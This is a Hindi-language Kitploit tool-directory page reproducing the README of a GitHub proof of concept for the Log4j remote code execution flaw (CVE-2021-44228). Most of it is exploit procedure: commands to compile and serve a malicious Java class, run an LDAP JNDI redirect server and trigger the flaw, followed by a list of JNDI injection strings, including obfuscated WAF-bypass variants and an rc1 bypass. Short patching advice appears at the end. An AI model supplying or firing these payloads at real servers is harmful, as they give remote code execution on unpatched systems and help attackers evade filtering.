Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-44228-Apache-Log4j-Rce — Apache Log4j दूरस्थ कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/tangxiaofeng7/cve-2021-44228-apache-log4j-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणWAF बाईपासलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubtangxiaofeng7/cve-2021-44228-apache-log4j-rce

CVE-2021-44228-Apache-Log4j-Rce

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

Apache Log4j दूरस्थ कोड निष्पादन

रिपॉजिटरी देखें
893024 साल पहलेKitploit द्वारा समीक्षित
साझा करें

CVE-2021-44228(Apache Log4j दूरस्थ कोड निष्पादन)

सभी log4j-core संस्करण >=2.0-beta9 और <=2.14.1

1.x के संस्करण में अन्य कमजोरियाँ हैं, हम अनुशंसा करते हैं कि आप नवीनतम संस्करण अपडेट करें।

Log4Shell (CVE-2021-44228) से जुड़ी सुरक्षा सलाहकारियाँ/बुलेटिन

उपयोग:

इस प्रोजेक्ट को डाउनलोड करें, एक्सप्लॉइट कोड blob/master/src/main/java/Exploit.java को कंपाइल करें, और एक वेबसर्वर शुरू करें जो संकलित बाइनरी को डाउनलोड करने की अनुमति देता है।

root@kitploit:~
git clone https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce.git
cd CVE-2021-44228-Apache-Log4j-Rce

javac Exploit.java

# start webserver
# For Python2
python -m SimpleHTTPServer 8888
# For Python3
python3 -m http.server 8888

# make sure python webserver is running the same directory as Exploit.class, to test
  curl -I 127.0.0.1:8888/Exploit.class

दूसरा प्रोजेक्ट डाउनलोड करें और JNDI संदर्भ लौटाने वाला LDAP सर्वर कार्यान्वयन चलाएँ https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/jndi/LDAPRefServer.java

root@kitploit:~
git clone https://github.com/mbechler/marshalsec.git cd marshalsec # Java 8 required mvn clean package -DskipTests java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

एक्टिवेशन कोड बनाएँ और चलाएँ (एक कमजोर जावा वेब सर्वर पर log4j हमले का अनुकरण) blob/master/src/main/java/log4j.java, और आपका कैलकुलेटर ऐप दिखाई देगा।

root@kitploit:~
cd CVE-2021-44228-Apache-Log4j-Rce
mvn clean package
java -cp target/log4j-rce-1.0-SNAPSHOT-all.jar log4j

# expect the following
# 1. calculator app appear
# 2. in ldapserver console,
#  Send LDAP reference result for Exploit redirecting to http://127.0.0.1:8888/Exploit.class
# 3. in webserver console,
#  127.0.0.1 - - [....] "GET /Exploit.class HTTP/1.1" 200 -


Tips:

अपने आप को बचाने के लिए वर्तमान Java संस्करण पर निर्भर न रहें। Log4 को अपडेट करें (या JNDI लुकअप हटाएँ)। विस्तार को अक्षम करें (वैसे भी यह एक बुरा विचार लगता है)।

rc1 को बायपास करें

उदाहरण के लिए:

root@kitploit:~
${jndi:ldap://127.0.0.1:1389/ badClassName}

WAF बायपास

root@kitploit:~
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

वेब एप्लिकेशन फ़ायरवॉल पर भरोसा न करें।

कमजोरी का विवरण

लुकअप, Log4j कॉन्फ़िगरेशन में मनमाने स्थानों पर मान जोड़ने का एक तरीका प्रदान करते हैं।

लुकअप

अंत में लीक का कारण बनने के तरीके

root@kitploit:~
LogManager.getLogger().error()
LogManager.getLogger().fatal()

सरल जाँच विधि

यदि आप ब्लैक-बॉक्स परीक्षण करना चाहते हैं, तो मैं सुझाव देता हूँ कि आप निष्क्रिय स्कैनिंग करें।

BurpLog4jScan

मज़े करें!!! BurpLog4jScan.png

समय के साथ स्टारगेज़र्स

Stargazers over time

टूल डाउनलोड करें